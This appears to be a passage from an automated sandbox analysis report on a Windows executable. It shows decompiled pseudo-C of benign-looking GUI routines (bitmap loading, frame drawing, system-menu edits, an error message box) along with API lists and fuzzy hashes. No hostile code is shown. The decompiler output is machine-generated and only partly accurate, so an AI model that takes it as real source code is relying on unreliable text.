Opcode Fuzzy Hash: dd5c2a34f4fbcdf76df79b6b7d2b8772f5761c490352404dce40c3bbbfdcd48f
Instruction Fuzzy Hash: 02910671E04648AFDB01DFA9C985EEEB7F9AF09304F1480A6F514F7252C679AE40CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004208F0, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 351
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004208F0(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				char* _t278;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				_t278 =  &_v36;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402A28(_v36 + 0x40c, 4, _t278);
				_v64 = _v28;
				_push(_t323);
				_push(0x420e0d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x420de0);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E0040343C(1);
						if(_a4 == 0) {
							E00402E84( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00415D44(_v60,  *_v60, _v36 - 4, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E00402E84(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0041D998();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00415CD4(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E0041DC1C( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00415CD4(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E0041DC3C( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E0041DEE4(_v32);
				}
				_push(0);
				L0040677C();
				_v16 = E0041DAAC(_t160);
				_push(_t323);
				_push(0x420d5b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x479444 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L0040648C();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040CA08(_t245, _t257, _t317, _t321);
							} else {
								E0041D998();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00415CD4(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x420d2a;
						 *[fs:eax] = _t290;
						_push(0x420d62);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L004069B4();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402A28(_t321, _t257, 0);
					_push(_t323);
					_push(0x420cc3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00415CD4(_v12, _t321, _v24);
					_push(_v16);
					L00406484();
					_v20 = E0041DAAC(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L0040647C();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E0041E1A8(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L004065AC();
						_v56 = _t204;
						_push(_v20);
						L00406584();
					}
					_push(_t323);
					_push(0x420c97);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406494();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040CA08(_t245, _t263, _t317, _t321);
						} else {
							E0041D998();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x420c9e);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L004065AC();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x004208f0
0x004208f1
0x004208f3
0x004208fc
0x004208fe
0x00420901
0x00420906
0x0042090b
0x00420910
0x00420913
0x00420920
0x00420927
0x0042092f
0x00420931
0x00420931
0x00420948
0x0042094e
0x00420953
0x00420954
0x00420959
0x0042095c
0x00420961
0x00420962
0x00420967
0x0042096a
0x00420971
0x004209d0
0x004209d3
0x004209d9
0x004209df
0x004209f9
0x00420a00
0x00420a0f
0x00420a14
0x00420a22
0x00420a2e
0x00420a2e
0x00420a3e
0x00420a4e
0x00420a62
0x00420a71
0x00420a83
0x00420a89
0x00420a89
0x00420973
0x00420983
0x00420986
0x00420992
0x00420997
0x0042099d
0x004209a4
0x004209ab
0x004209b3
0x004209b7
0x004209b7
0x00420a8c
0x00420a92
0x00420a9a
0x00420aa2
0x00420aa4
0x00420aa4
0x00420aad
0x00420aaf
0x00420ab7
0x00420ac3
0x00420ad0
0x00420ad5
0x00420ad9
0x00420ad9
0x00420ac3
0x00420ab7
0x00420ae0
0x00420aeb
0x00420aeb
0x00420af1
0x00420afd
0x00420b06
0x00420b18
0x00420b1e
0x00420b20
0x00420b2c
0x00420b36
0x00420b3b
0x00420b3e
0x00420b3e
0x00420b41
0x00420b46
0x00420b48
0x00420b48
0x00420b4e
0x00420b53
0x00420b53
0x00420b58
0x00420b5a
0x00420b64
0x00420b69
0x00420b6a
0x00420b6f
0x00420b72
0x00420b78
0x00420b7d
0x00420b8b
0x00420cca
0x00420ccc
0x00420cd1
0x00420cd2
0x00420cd7
0x00420cd8
0x00420cdb
0x00420cdc
0x00420ce1
0x00420ce8
0x00420cf7
0x00420d00
0x00420cf9
0x00420cf9
0x00420cf9
0x00420cf7
0x00420d07
0x00420d0d
0x00420d10
0x00420d1b
0x00420d22
0x00420d25
0x00420d44
0x00420d47
0x00420d4a
0x00420d4f
0x00420d52
0x00420d53
0x00420d55
0x00420d5a
0x00000000
0x00000000
0x00000000
0x00420b91
0x00420b91
0x00420b93
0x00420b9d
0x00420ba2
0x00420ba3
0x00420ba8
0x00420bab
0x00420bb1
0x00420bb6
0x00420bbe
0x00420bbf
0x00420bc9
0x00420bcc
0x00420bce
0x00420bd0
0x00420bd3
0x00420bd4
0x00420be3
0x00420be8
0x00420bee
0x00420bf3
0x00420bf5
0x00420c01
0x00420c04
0x00420c09
0x00420c0a
0x00420c0d
0x00420c0e
0x00420c13
0x00420c19
0x00420c1a
0x00420c1a
0x00420c21
0x00420c22
0x00420c27
0x00420c2a
0x00420c2d
0x00420c2f
0x00420c32
0x00420c36
0x00420c37
0x00420c39
0x00420c3a
0x00420c3d
0x00420c3e
0x00420c43
0x00420c4a
0x00420c53
0x00420c5c
0x00420c55
0x00420c55
0x00420c55
0x00420c53
0x00420c63
0x00420c66
0x00420c69
0x00420c72
0x00420c74
0x00420c79
0x00420c7d
0x00420c7e
0x00420c7e
0x00420c96
0x00420c96

APIs

72E7AC50.USER32(00000000,?,00000000,00420E0D,?,?), ref: 00420B5A
SelectObject.GDI32(?,00000000), ref: 00420BDE
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00420C97,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00420C4C
SelectObject.GDI32(?,?), ref: 00420C8B
DeleteObject.GDI32(00000000), ref: 00420C91

Strings

X"A, xrefs: 004209EF
(, xrefs: 00420AA9
BM, xrefs: 00420A14

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Object$Select$DeleteErrorLast
String ID: ($BM$X"A
API String ID: 1836871137-2099707101
Opcode ID: 65ebd3c6de9f86ff2aaa0dafb7fb505163f65297c935957f7a600e9459d5bc79
Instruction ID: 400df8316d0022c62dda291a9a8f23d2c8e586c00b2cdd9e5bbb39fd84a375aa
Opcode Fuzzy Hash: 65ebd3c6de9f86ff2aaa0dafb7fb505163f65297c935957f7a600e9459d5bc79
Instruction Fuzzy Hash: A1D14F70A002189FDF14DFA9D885BAEBBF5EF48304F50856AE905EB396D7789840CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00430418, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430418(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00413E68( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041C3A8(0xff000010));
							E00412A34( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041C3A8(0xff000014));
							E00412A34( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00413EC4(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00413E68( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412A34( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E0042A894(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0042D0C4(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x0043041c
0x0043041f
0x00430421
0x00430423
0x0043042c
0x0043044a
0x0043044a
0x0043044d
0x00430455
0x0043053a
0x0043053a
0x00430542
0x00430647
0x00430647
0x00430647
0x0043054b
0x0043054e
0x00000000
0x00000000
0x00430555
0x00430559
0x0043055b
0x00430563
0x00430568
0x00430571
0x004305ab
0x004305ce
0x004305d9
0x004305e3
0x004305f8
0x0043061b
0x00430626
0x00430630
0x00430630
0x00430635
0x00430636
0x00430636
0x00430636
0x00000000
0x0043055b
0x0043045b
0x0043045f
0x00430468
0x0043046c
0x0043046e
0x0043046e
0x0043046c
0x00430479
0x0043047f
0x00430485
0x00430492
0x00430498
0x004304c6
0x004304d8
0x004304de
0x004304e0
0x004304e0
0x004304ec
0x004304f8
0x0043050a
0x0043051a
0x00430525
0x0043052a
0x0043052a
0x004304d8
0x00430530
0x00430531
0x00430485

APIs

RectVisible.GDI32(?,?), ref: 004304D1
SaveDC.GDI32(?), ref: 004304E7
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043050A
RestoreDC.GDI32(?,?), ref: 00430525
CreateSolidBrush.GDI32(00000000), ref: 004305A6
FrameRect.USER32(?,?,?), ref: 004305D9
DeleteObject.GDI32(?), ref: 004305E3
CreateSolidBrush.GDI32(00000000), ref: 004305F3
FrameRect.USER32(?,?,00000000), ref: 00430626
DeleteObject.GDI32(00000000), ref: 00430630

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 2130029f683dfaa11343a8d93295155c69f427ce61c3c954a28852ae6f49cdfb
Instruction ID: 76b4226a74cb8447095f001428335fd808d6ff81025d9e78c1e3b277ea1b3c7e
Opcode Fuzzy Hash: 2130029f683dfaa11343a8d93295155c69f427ce61c3c954a28852ae6f49cdfb
Instruction Fuzzy Hash: 13517E712043409BD718DF29C8D4B5B77D8AF48308F04459EEE89CB39AD639E845CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00425EC8, Relevance: 15.1, APIs: 10, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00425EC8(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E0043260C(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E0043260C(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E0043260C(_v8);
					_push(_t55);
					L00406874();
					_v12 = _t55;
					_push(_t120);
					_push(0x426023);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E0043260C(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00412A34(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00425B00( &_v56, 2);
					E00425A54(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x42602a);
					_push(_v12);
					_t74 = E0043260C(_v8);
					_push(_t74);
					L004069B4();
					return _t74;
				}
			}

0x00425ec9
0x00425ecb
0x00425ed1
0x00425ed3
0x00425ed6
0x00425ee3
0x00425eeb
0x00426030
0x00425ef1
0x00425efe
0x00425f13
0x00425f1b
0x00425f20
0x00425f21
0x00425f26
0x00425f2b
0x00425f2c
0x00425f31
0x00425f34
0x00425f3e
0x00425f3f
0x00425f40
0x00425f41
0x00425f42
0x00425f45
0x00425f52
0x00425f5c
0x00425f67
0x00425f70
0x00425f7f
0x00425f99
0x00425fa5
0x00425fa6
0x00425fa7
0x00425fa8
0x00425fa9
0x00425fba
0x00425fba
0x00425f5c
0x00425fdf
0x00425feb
0x00425ffe
0x00426005
0x00426008
0x0042600b
0x00426013
0x00426017
0x0042601c
0x0042601d
0x00426022
0x00426022

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 00425EE3
GetWindowRect.USER32(00000000,?), ref: 00425EFE
OffsetRect.USER32(?,?,?), ref: 00425F13
GetWindowLongA.USER32(00000000,000000F0), ref: 00425F52
GetSystemMetrics.USER32(00000002), ref: 00425F67
GetSystemMetrics.USER32(00000003), ref: 00425F70
InflateRect.USER32(?,000000FE,000000FE), ref: 00425F7F
GetSysColorBrush.USER32(0000000F), ref: 00425FAC
FillRect.USER32(?,?,00000000), ref: 00425FBA
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00426023,?,00000000,?,?,?,00000000,?), ref: 00425FDF

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffset
String ID:
API String ID: 239630386-0
Opcode ID: 5cfe9c1719cad97590ea08ab6666c7d33f48a260923e04fd4c01c46f56bcbc9f
Instruction ID: e53a65903ccee42e5f6fcae7e18b5d5aa6b4d4c014f47d30bc0a516c324194aa
Opcode Fuzzy Hash: 5cfe9c1719cad97590ea08ab6666c7d33f48a260923e04fd4c01c46f56bcbc9f
Instruction Fuzzy Hash: B1415172A05118AFCB00EBA9DD42EDFB7BDEF49314F514126F905F7282CA799E008768

Uniqueness

Uniqueness Score: -1.00%

Function 00446BA0, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00446BA0(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043260C( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x00446ba7
0x00446bb1
0x00446bba
0x00446bc4
0x00446bcd
0x00446bd7
0x00446bf0
0x00446bff
0x00446c09
0x00446c16
0x00446c23
0x00446c30
0x00446c3d
0x00446c4a
0x00000000
0x00446c57
0x00446c6b
0x00446c75
0x00446c75
0x00446c7d
0x00446c87
0x00000000
0x00446c91
0x00446c87
0x00446bd7
0x00446bc4
0x00446c98

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00446BEB
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00446C09
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C16
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C23
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C30
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00446C3D
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00446C4A
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00446C57
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00446C75
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00446C91

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 1578a015d6a4f16f9d011122d5a6aa6c0f754864a9dfacbbcd4cb5b0edce9c47
Instruction ID: b00eb82c13fbf299b1f57cea2b1741d23b11299a1552c6a95d4a4ad9b46c6cb8
Opcode Fuzzy Hash: 1578a015d6a4f16f9d011122d5a6aa6c0f754864a9dfacbbcd4cb5b0edce9c47
Instruction Fuzzy Hash: C6216AB03403407AF720AF25CD8EF597BD99B15B18F0644A5BA497F2D3CABDB991821C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B554, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B554(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				_t40 = __edx;
				E0040B3BC(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x47a020; // 0x47b044
				if( *_t14 == 0) {
					_t16 =  *0x479dfc; // 0x406e3c
					_t9 = _t16 + 4; // 0xffea
					_t18 =  *0x47b660; // 0x400000
					LoadStringA(E00405290(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x479e50; // 0x47b214
				E00402BB4(E00402D10(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00408640( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40b618, 2,  &_v1092, 0);
			}

0x0040b554
0x0040b563
0x0040b568
0x0040b570
0x0040b5d7
0x0040b5dc
0x0040b5e0
0x0040b5eb
0x00000000
0x0040b601
0x0040b572
0x0040b57c
0x0040b58b
0x0040b59b
0x0040b5ae
0x00000000

APIs

Part of subcall function 0040B3BC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
Part of subcall function 0040B3BC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
Part of subcall function 0040B3BC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
Part of subcall function 0040B3BC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB

CharToOemA.USER32(?,?), ref: 0040B58B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B5A8
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5AE
GetStdHandle.KERNEL32(000000F4,0040B618,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5C3
WriteFile.KERNEL32(00000000,000000F4,0040B618,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5C9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0040B5EB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040B601

Strings

<n@, xrefs: 0040B5D7

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

